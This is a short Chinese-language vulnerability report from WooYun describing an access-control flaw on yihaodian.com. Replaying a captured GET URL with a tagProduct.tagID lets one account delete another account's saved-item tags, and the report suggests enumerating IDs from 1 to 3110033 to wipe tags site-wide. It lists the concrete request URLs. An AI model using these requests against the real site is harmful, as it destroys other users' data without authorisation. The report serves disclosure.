WooYun.org

老规矩，注册两个账户
USERA登入
在收藏的商品里随便编辑个标签如下图：

截获下删除的请求如下图：

记录下tagProduct.tagID
3110033
由于是get请求我们可以记录下整个请求
http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033
不要把请求发过去，刷新下页面确认未删除后，USERA可以退出了
好了，USERB登场
登入后直接在浏览器上输入刚才记录的地址
http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033
发送过去，好了USERB的工作完成了，可以退出了
再次登入USERA，登入后查看我的收藏，发现对应的标签被删除了

tagProduct.tagID就是那么几个数字而已，直接遍历下：
http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=1
http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=2
。
。
。
http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033